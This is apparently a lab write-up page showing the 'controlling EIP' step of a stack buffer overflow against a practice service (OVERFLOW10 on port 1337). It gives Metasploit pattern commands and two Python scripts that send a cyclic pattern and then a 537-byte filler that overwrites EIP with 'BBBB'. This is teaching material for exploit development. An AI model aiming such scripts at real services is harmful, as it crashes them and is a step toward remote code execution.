Controlling the EIP

To take control of the EIP, we first need to locate the EIP’s exact position in the buffer of 600. To do this we will make use of a tool called “msf-pattern_create”.

Creating Pattern
msf-pattern_create -l 600
Update POC
After creating the pattern, modify the code from the previous iteration (Crasher.py) to send the newly generated pattern as the buffer instead.
controllingEip.py
#!/usr/bin/python
import socket
​
try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    buffer = prefix + "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9"
​
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
​
    s.connect(("windows.box", 1337))
    s.send(buffer)
​
    s.close()
​
    print ("\nDone!")
  
except:
    print ("\nCould not connect!")
Controlling Eip
python controllingEip.py
EIP = 41397241
Further inspecting the registers, as shown above, reveals that our EIP now has a unique value instead of the 4 bytes of “\x41” OR “A” we saw in the previous iteration.
Locating EIP
Now that we have sent in our custom pattern and extracted the value @ EIP, we have to figure out where that is in the buffer. The tool ”msf-pattern_offset” will help us with that.
msf-pattern_offset -l 600 -q 41397241
EIP Was found at 537 Bytes
controlledEip.py
Now let's verify that by further modifying our initial code, we are able to write 4 Bs OR 4 bytes of \x42 into the EIP.
#!/usr/bin/python
import socket
​
try:
    print ("\nSending evil buffer...")
    
    prefix = "OVERFLOW10 "
    filler = "A" * 537
    eip = "B" * 4
    buffer = prefix + filler + eip
​
    s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
​
    s.connect(("windows.box", 1337))
    s.send(buffer)
​
    s.close()
​
    print ("\nDone!")
  
except:
    print ("\nCould not connect!")
Controlled Eip
python controlledEip.py
After running the new exploit code, we are able to see that we have successfully over-written the EIP with \x42\x42\x42\x42. Now we have gained control of the EIP and are ready to move on to the next step.

Crashing the Application

Finding Bad Characters

Last modified 2yr ago